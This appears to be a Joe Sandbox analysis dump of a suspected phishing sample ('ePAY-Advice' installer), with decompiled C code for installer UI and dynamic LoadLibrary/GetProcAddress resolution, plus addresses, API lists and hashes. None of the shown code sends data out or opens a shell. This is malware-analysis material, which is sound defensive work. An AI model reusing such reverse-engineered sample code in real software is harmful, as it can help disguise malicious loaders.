						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x423780 = _t306;
					 *0x41fd00 = GlobalAlloc(0x40,  *0x42374c << 2);
					_t252 = LoadBitmapA( *0x423700, 0x6e);
					 *0x41fcf4 =  *0x41fcf4 | 0xffffffff;
					_t313 = _t252;
					 *0x41fcfc = SetWindowLongA(_v8, 0xfffffffc, E00405005);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x41fcec = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x41fcec);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							_t279 = SendMessageA(_v12, 0x143, _t282, E00405F8C(_t282, _t314, _t318, _t282, _t260)); // executed
							SendMessageA(_v12, 0x151, _t279, _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404009(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404009(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42374c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84); // executed
										 *( *0x41fd00 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x41fd00 + _t316 * 4) = _t276;
									_t284 =  *( *0x41fd00 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42374c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040403E(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040403E(_v12);
								L91:
								return E00404070(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404a1d
0x00404a2e
0x00404a33
0x00404a3b
0x00404a41
0x00404a49
0x00404a57
0x00404a5a
0x00404c7a
0x00404c81
0x00404c95
0x00404c83
0x00404c85
0x00404c88
0x00404c89
0x00404c90
0x00404c90
0x00404ca1
0x00404caf
0x00404cb2
0x00404cc8
0x00404d3d
0x00404d40
0x00404d42
0x00404d4c
0x00404d5a
0x00404d5a
0x00404d5c
0x00404d66
0x00404d6c
0x00404d6f
0x00404d72
0x00404d8d
0x00404d74
0x00404d7e
0x00404d7e
0x00404d72
0x00404d66
0x00000000
0x00404d40
0x00404ccd
0x00404cd8
0x00404cdd
0x00404ce4
0x00404ce9
0x00404ced
0x00404cf8
0x00404cf8
0x00404cfc
0x00404d00
0x00404d04
0x00404d17
0x00404d06
0x00404d06
0x00404d0d
0x00404d13
0x00404d0f
0x00404d0f
0x00404d0f
0x00404d0d
0x00404d1b
0x00404d1d
0x00404d30
0x00404d33
0x00404d36
0x00404d36
0x00404d00
0x00000000
0x00404ced
0x00404ccf
0x00404cd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404d90
0x00404d90
0x00404d97
0x00404e08
0x00404e10
0x00404e18
0x00404e18
0x00404e21
0x00404e23
0x00404e2a
0x00404e2d
0x00404e2d
0x00404e33
0x00404e3a
0x00404e3d
0x00404e3d
0x00404e43
0x00404e49
0x00404e4f
0x00404e4f
0x00404e5c
0x00404fb2
0x00404fb9
0x00404fd6
0x00404fdc
0x00404fee
0x00404fee
0x00000000
0x00404e62
0x00404e64
0x00404e69
0x00404e6e
0x00404e73
0x00404e75
0x00404e75
0x00404e76
0x00404e77
0x00404e79
0x00404e79
0x00404e81
0x00404ec2
0x00404ec4
0x00404ed4
0x00404ed7
0x00404edc
0x00404ee3
0x00404ee6
0x00404f88
0x00404f8e
0x00404f94
0x00404f9c
0x00404fad
0x00404fad
0x00000000
0x00404f9c
0x00404eec
0x00404eef
0x00404ef5
0x00404efa
0x00404efc
0x00404efe
0x00404f04
0x00404f0b
0x00404f10
0x00404f17
0x00404f1a
0x00404f1a
0x00404f21
0x00404f2d
0x00404f31
0x00404f33
0x00404f33
0x00404f23
0x00404f25
0x00404f25
0x00404f53
0x00404f5f
0x00404f6e
0x00404f6e
0x00404f70
0x00404f73
0x00404f7c
0x00000000
0x00404e83
0x00404e8e
0x00404e91
0x00404e96
0x00404e98
0x00404e9c
0x00404eac
0x00404eb6
0x00404eb8
0x00404ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x00404e9e
0x00404e9e
0x00404ea4
0x00404ea6
0x00404ea6
0x00404ea7
0x00404ea8
0x00000000
0x00404e9e
0x00404e81
0x00404e5c
0x00404d9f
0x00000000
0x00404db5
0x00404dbf
0x00404dc4
0x00000000
0x00000000
0x00404dd6
0x00404ddb
0x00404de7
0x00404de7
0x00404de9
0x00404df8
0x00404dfa
0x00404dfe
0x00404e01
0x00000000
0x00404e01
0x00404d9f
0x00404a60
0x00404a65
0x00404a6e
0x00404a75
0x00404a83
0x00404a8e
0x00404a94
0x00404aa2
0x00404ab6
0x00404abb
0x00404ac8
0x00404acd
0x00404ae3
0x00404af4
0x00404b01
0x00404b01
0x00404b04
0x00404b0a
0x00404b0c
0x00404b0f
0x00404b14
0x00404b19
0x00404b1b
0x00404b1b
0x00404b2f
0x00404b3b
0x00404b3b
0x00404b3d
0x00404b3e
0x00404b43
0x00404b46
0x00404b49
0x00404b4d
0x00404b52
0x00404b57
0x00404b5b
0x00404b60
0x00404b65
0x00404b67
0x00404b6f
0x00404c39
0x00404c4c
0x00000000
0x00404b75
0x00404b78
0x00404b7b
0x00404b7e
0x00404b7e
0x00404b84
0x00404b8a
0x00404b8d
0x00404b93
0x00404b94
0x00404b99
0x00404ba2
0x00404ba9
0x00404bac
0x00404baf
0x00404bb2
0x00404bee
0x00404c0f
0x00404c17
0x00404bf0
0x00404bfd
0x00404bfd
0x00404bb4
0x00404bb7
0x00404bc6
0x00404bd0
0x00404bd8
0x00404bdf
0x00404be7
0x00404be7
0x00404bb2
0x00404c1d
0x00404c1e
0x00404c2a
0x00404c2a
0x00404c37
0x00404c52
0x00404c56
0x00404c73
0x00404c78
0x00000000
0x00404c58
0x00404c5d
0x00404c66
0x00404ff0
0x00405002
0x00405002
0x00404c56
0x00000000
0x00404c37
0x00404b6f

APIs

GetDlgItem.USER32 ref: 00404A26
GetDlgItem.USER32 ref: 00404A31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A7B
LoadBitmapA.USER32 ref: 00404A8E
SetWindowLongA.USER32 ref: 00404AA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404ABB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404ACD
SendMessageA.USER32(?,00001109,00000002), ref: 00404AE3
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEF
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B01
DeleteObject.GDI32(00000000), ref: 00404B04
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2F
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B3B
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD0
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BFB
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0F
GetWindowLongA.USER32 ref: 00404C3E
SetWindowLongA.USER32 ref: 00404C4C
ShowWindow.USER32(?,00000005), ref: 00404C5D
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D5A
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBF
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DD4
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF8
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E18
ImageList_Destroy.COMCTL32(?), ref: 00404E2D
GlobalFree.KERNEL32 ref: 00404E3D
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB6
SendMessageA.USER32(?,00001102,?,?), ref: 00404F5F
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F6E
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F8E
ShowWindow.USER32(?,00000000), ref: 00404FDC
GetDlgItem.USER32 ref: 00404FE7
ShowWindow.USER32(00000000), ref: 00404FEE

Strings

, xrefs: 00404FC6
M, xrefs: 00404BB7
N, xrefs: 00404C98

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 3aa9200d0cef3cc9d1c9496a6dfc6ea5d4dcc70451646f22d4cf46085a2c9c50
Instruction ID: e53edbee2b152b0549b5e4175851bd50996010034005c2ce37e30fc0cedab0f1
Opcode Fuzzy Hash: 3aa9200d0cef3cc9d1c9496a6dfc6ea5d4dcc70451646f22d4cf46085a2c9c50
Instruction Fuzzy Hash: A50260B0900209AFEB20DF94DC85AAE7BB5FB84315F10817AF610B62E1D7799D42DF58

Uniqueness

Uniqueness Score: -1.00%

Function 6E161A9C Relevance: 25.1, APIs: 13, Strings: 1, Instructions: 571
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6E161A9C() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				CHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				CHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				char* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				signed int _t253;
				signed int _t259;
				signed int _t262;
				signed int _t264;
				void* _t267;
				void* _t271;
				struct HINSTANCE__* _t273;
				signed char _t276;
				void _t277;
				signed int _t278;
				signed int _t290;
				signed int _t291;
				void* _t293;
				signed int _t297;
				signed int _t300;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed char _t308;
				signed int _t309;
				CHAR* _t310;
				CHAR* _t312;
				CHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t317;
				void* _t318;

				_t273 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t318 = 0;
				_v48 = 0;
				_t199 = E6E161215();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E6E161215();
				_t309 = E6E16123B();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t273 && _t318 == _t273) {
						break;
					}
					_t308 =  *_t309;
					_t276 = _t308;
					_t204 = _t276 - _t273;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t273;
						if(_t206 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t318 - _t273;
							if(_t318 == _t273) {
								_t246 = GlobalAlloc(0x40, 0x14a4); // executed
								_t318 = _t246;
								 *(_t318 + 0x810) = _t273;
								 *(_t318 + 0x814) = _t273;
							}
							_t277 = _v36;
							_t43 = _t318 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t318 + 0x408; // 0x408
							_t310 = _t44;
							 *_t318 = _t277;
							 *_t208 =  *_t208 & 0x00000000;
							 *(_t318 + 0x808) = _t273;
							 *_t310 =  *_t310 & 0x00000000;
							_t278 = _t277 - _t273;
							__eflags = _t278;
							 *(_t318 + 0x80c) = _t273;
							 *(_t318 + 4) = _t273;
							if(_t278 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t318);
								_t318 = E6E1612FE(_v24);
								__eflags = _t318 - _t273;
								if(_t318 == _t273) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t318 + 0x14a0);
									__eflags = _t240 - _t273;
									if(_t240 == _t273) {
										break;
									}
									_t316 = _t318;
									_t318 = _t240;
									__eflags = _t318 - _t273;
									if(_t318 != _t273) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t273;
								if(_t316 != _t273) {
									 *(_t316 + 0x14a0) = _t273;
								}
								_t241 =  *(_t318 + 0x810);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t318 + 0x810) = _t242;
								} else {
									_t318 = E6E161534(_t318);
									 *(_t318 + 0x810) =  *(_t318 + 0x810) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t290 = _t278 - 1;
								__eflags = _t290;
								if(_t290 == 0) {
									L28:
									lstrcpyA(_t208, _v44);
									L29:
									lstrcpyA(_t310, _v24);
									L39:
									_v12 = _v12 + 1;
									_v28 = _v24;
									L56:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t291 = _t290 - 1;
								__eflags = _t291;
								if(_t291 == 0) {
									goto L29;
								}
								__eflags = _t291 != 1;
								if(_t291 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t273) {
							_t248 = _t248 - 1;
						}
						 *(_t318 + 0x814) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t273;
							_v36 = _t273;
							goto L17;
						}
						__eflags =  *((char*)(_t309 - 1)) - 0x3a;
						if( *((char*)(_t309 - 1)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t273;
						if(_v32 == _t273) {
							L40:
							_t251 = _v32 - _t273;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t308 - 0x2a;
								if(_t308 == 0x2a) {
									_v36 = 2;
									L54:
									_t309 = _v12;
									_v28 = _v24;
									_t273 = 0;
									__eflags = 0;
									L55:
									_t317 = _t309 + 1;
									__eflags = _t317;
									_v12 = _t317;
									goto L56;
								}
								__eflags = _t308 - 0x2d;
								if(_t308 == 0x2d) {
									L145:
									_t253 = _t309 + 1;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										L147:
										_t253 = _t309 + 1;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L154:
											_v28 =  &(_v28[1]);
											 *_v28 = _t308;
											goto L55;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L154;
										}
										_v36 = 1;
										L150:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L54;
									}
									_v36 = 3;
									goto L150;
								}
								__eflags = _t308 - 0x3a;
								if(_t308 != 0x3a) {
									goto L154;
								}
								__eflags = _t308 - 0x2d;
								if(_t308 != 0x2d) {
									goto L147;
								}
								goto L145;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L77:
								_t293 = _t276 + 0xffffffde;
								__eflags = _t293 - 0x55;
								if(_t293 > 0x55) {
									goto L54;
								}
								switch( *((intOrPtr*)(( *(_t293 + 0x6e16221d) & 0x000000ff) * 4 +  &M6E162191))) {
									case 0:
										__eax = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L129;
											}
											L128:
											__eflags =  *(__edi + 1) - __dl;
											if( *(__edi + 1) != __dl) {
												L133:
												 *__eax =  *__eax & 0x00000000;
												__eax = E6E161224(_v24);
												__ebx = __eax;
												goto L94;
											}
											L129:
											__eflags = __cl;
											if(__cl == 0) {
												goto L133;
											}
											__eflags = __cl - __dl;
											if(__cl == __dl) {
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__cl =  *__edi;
											 *__eax =  *__edi;
											__eax = __eax + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L129;
											}
											goto L128;
										}
									case 1:
										_v8 = 1;
										goto L54;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L54;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L82;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L54;
										}
										_v12 = _v12 - 1;
										__ebx = E6E161215();
										 &_v12 = E6E161A3A( &_v12);
										__eax = E6E161429(__edx, __eax, __edx, __ebx);
										goto L94;
									case 5:
										L102:
										_v20 = _v20 + 1;
										goto L54;
									case 6:
										_push(7);
										goto L120;
									case 7:
										_push(0x19);
										goto L140;
									case 8:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L104;
									case 9:
										_push(0x15);
										goto L140;
									case 0xa:
										_push(0x16);
										goto L140;
									case 0xb:
										_push(0x18);
										goto L140;
									case 0xc:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L115;
									case 0xd:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L106;
									case 0xe:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L108;
									case 0xf:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L119;
									case 0x10:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L110;
									case 0x11:
										_push(3);
										goto L120;
									case 0x12:
										_push(0x17);
										L140:
										_pop(__ebx);
										goto L95;
									case 0x13:
										__eax =  &_v12;
										__eax = E6E161A3A( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L94;
									case 0x14:
										__ebx = 0xffffffff;
										goto L95;
									case 0x15:
										__eax = 0;
										__eflags = 0;
										goto L113;
									case 0x16:
										__ecx = 0;
										__eflags = 0;
										goto L88;
									case 0x17:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L117;
									case 0x18:
										_t261 =  *(_t318 + 0x814);
										__eflags = _t261 - _v16;
										if(_t261 > _v16) {
											_v16 = _t261;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t261 - (_v36 == 3);
										if(_t261 != _v36 == 3) {
											L82:
											_v40 = 1;
										}
										goto L54;
									case 0x19:
										L104:
										__ecx = 0;
										_v8 = 2;
										__ecx = 1;
										goto L88;
									case 0x1a:
										L115:
										_push(5);
										goto L120;
									case 0x1b:
										L106:
										__ecx = 0;
										_v8 = 3;
										__ecx = 1;
										goto L88;
									case 0x1c:
										L108:
										__ecx = 0;
										__ecx = 1;
										goto L88;
									case 0x1d:
										L119:
										_push(6);
										goto L120;
									case 0x1e:
										L110:
										_push(2);
										goto L120;
									case 0x1f:
										__eax =  &_v12;
										__eax = E6E161A3A( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										goto L94;
									case 0x20:
										L113:
										_v48 = _v48 + 1;
										_push(3);
										_pop(__ecx);
										goto L88;
									case 0x21:
										L117:
										_push(4);
										L120:
										_pop(__ecx);
										L88:
										__edi = _v16;
										__edx =  *(0x6e16305c + __ecx * 4);
										__eax =  ~__eax;
										asm("sbb eax, eax");
										_v40 = 1;
										__edi = _v16 << 5;
										__eax = __eax & 0x00008000;
										__edi = (_v16 << 5) + __esi;
										__eax = __eax | __ecx;
										__eflags = _v8;
										 *(__edi + 0x818) = __eax;
										if(_v8 < 0) {
											L90:
											__edx = 0;
											__edx = 1;
											__eflags = 1;
											L91:
											__eflags = _v8 - 1;
											 *(__edi + 0x828) = __edx;
											if(_v8 == 1) {
												__eax =  &_v12;
												__eax = E6E161A3A( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
											_t132 = _v16 + 0x41; // 0x41
											_t132 = _t132 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t132 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x830)) = 0;
											 *((intOrPtr*)(__edi + 0x82c)) = 0;
											L94:
											__eflags = __ebx;
											if(__ebx == 0) {
												goto L54;
											}
											L95:
											__eflags = _v20;
											_v40 = 1;
											if(_v20 != 0) {
												L100:
												__eflags = _v20 - 1;
												if(_v20 == 1) {
													__eax = _v16;
													__eax = _v16 << 5;
													__eflags = __eax;
													 *(__eax + __esi + 0x82c) = __ebx;
												}
												goto L102;
											}
											_v16 = _v16 << 5;
											_t140 = __esi + 0x830; // 0x830
											__edi = (_v16 << 5) + _t140;
											__eax =  *__edi;
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L98:
												__eax = GlobalFree(__eax);
												L99:
												 *__edi = __ebx;
												goto L100;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L99;
											}
											goto L98;
										}
										__eflags = __edx;
										if(__edx > 0) {
											goto L91;
										}
										goto L90;
									case 0x22:
										goto L54;
								}
							}
							_t262 = _t259 - 1;
							__eflags = _t262;
							if(_t262 == 0) {
								_v16 = _t273;
								goto L77;
							}
							__eflags = _t262 != 1;
							if(_t262 != 1) {
								goto L154;
							}
							__eflags = _t276 - 0x6e;
							if(__eflags > 0) {
								_t297 = _t276 - 0x72;
								__eflags = _t297;
								if(_t297 == 0) {
									_push(4);
									L71:
									_pop(_t264);
									L72:
									__eflags = _v8 - 1;
									if(_v8 != 1) {
										_t92 = _t318 + 0x810;
										 *_t92 =  *(_t318 + 0x810) &  !_t264;
										__eflags =  *_t92;
									} else {
										 *(_t318 + 0x810) =  *(_t318 + 0x810) | _t264;
									}
									_v8 = 1;
									goto L54;
								}
								_t300 = _t297 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									_push(0x10);
									goto L71;
								}
								__eflags = _t300 != 0;
								if(_t300 != 0) {
									goto L54;
								}
								_push(0x40);
								goto L71;
							}
							if(__eflags == 0) {
								_push(8);
								goto L71;
							}
							_t303 = _t276 - 0x21;
							__eflags = _t303;
							if(_t303 == 0) {
								_v8 =  ~_v8;
								goto L54;
							}
							_t304 = _t303 - 0x11;
							__eflags = _t304;
							if(_t304 == 0) {
								_t264 = 0x100;
								goto L72;
							}
							_t305 = _t304 - 0x31;
							__eflags = _t305;
							if(_t305 == 0) {
								_t264 = 1;
								goto L72;
							}
							__eflags = _t305 != 0;
							if(_t305 != 0) {
								goto L54;
							}
							_push(0x20);
							goto L71;
						}
						goto L15;
					}
					_t267 = _t249 - 5;
					if(_t267 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t273;
						_v20 = _t273;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t273;
						goto L17;
					}
					_t271 = _t267 - 1;
					if(_t271 == 0) {
						_v32 = 2;
						_v8 = _t273;
						_v20 = _t273;
						goto L17;
					}
					if(_t271 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t318 == _t273 ||  *(_t318 + 0x80c) != _t273) {
					L174:
					return _t318;
				} else {
					_t216 =  *_t318 - 1;
					if(_t216 == 0) {
						_t179 = _t318 + 8; // 0x8
						_t312 = _t179;
						__eflags =  *_t312;
						if( *_t312 != 0) {
							_t217 = GetModuleHandleA(_t312);
							__eflags = _t217 - _t273;
							 *(_t318 + 0x808) = _t217;
							if(_t217 != _t273) {
								L163:
								_t184 = _t318 + 0x408; // 0x408
								_t313 = _t184;
								_t218 = E6E1615C6( *(_t318 + 0x808), _t313);
								__eflags = _t218 - _t273;
								 *(_t318 + 0x80c) = _t218;
								if(_t218 == _t273) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t187 = _t318 + 0x409; // 0x409
										_t222 = E6E1612FE(_t187);
										__eflags = _t222 - _t273;
										if(_t222 != _t273) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t318 + 0x80c) = GetProcAddress( *(_t318 + 0x808), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t273;
								if(_v48 != _t273) {
									L170:
									_t313[lstrlenA(_t313)] = 0x41;
									_t220 = E6E1615C6( *(_t318 + 0x808), _t313);
									__eflags = _t220 - _t273;
									if(_t220 != _t273) {
										L158:
										 *(_t318 + 0x80c) = _t220;
										goto L174;
									}
									__eflags =  *(_t318 + 0x80c) - _t273;
									L172:
									if(__eflags != 0) {
										goto L174;
									}
									L173:
									_t197 = _t318 + 4;
									 *_t197 =  *(_t318 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L174;
								} else {
									__eflags =  *(_t318 + 0x80c) - _t273;
									if( *(_t318 + 0x80c) != _t273) {
										goto L174;
									}
									goto L170;
								}
							}
							_t225 = LoadLibraryA(_t312);
							__eflags = _t225 - _t273;
							 *(_t318 + 0x808) = _t225;
							if(_t225 == _t273) {
								goto L173;
							}
							goto L163;
						}
						_t180 = _t318 + 0x408; // 0x408
						_t227 = E6E1612FE(_t180);
						 *(_t318 + 0x80c) = _t227;
						__eflags = _t227 - _t273;
						goto L172;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t177 = _t318 + 0x408; // 0x408
						_t229 = _t177;
						__eflags =  *_t229;
						if( *_t229 == 0) {
							goto L174;
						}
						_t220 = E6E1612FE(_t229);
						L157:
						goto L158;
					}
					if(_t228 != 1) {
						goto L174;
					}
					_t77 = _t318 + 8; // 0x8
					_t274 = _t77;
					_t314 = E6E1612FE(_t77);
					 *(_t318 + 0x808) = _t314;
					if(_t314 == 0) {
						goto L173;
					}
					 *(_t318 + 0x84c) =  *(_t318 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t318 + 0x850)) = E6E161224(_t274);
					 *(_t318 + 0x83c) =  *(_t318 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t318 + 0x848)) = 1;
					 *((intOrPtr*)(_t318 + 0x838)) = 1;
					_t86 = _t318 + 0x408; // 0x408
					_t220 =  *(_t314->i + E6E1612FE(_t86) * 4);
					goto L157;
				}
			}

0x6e161aa4
0x6e161aa7
0x6e161aaa
0x6e161aad
0x6e161ab0
0x6e161ab3
0x6e161ab6
0x6e161ab8
0x6e161abb
0x6e161ac0
0x6e161ac3
0x6e161acb
0x6e161ad3
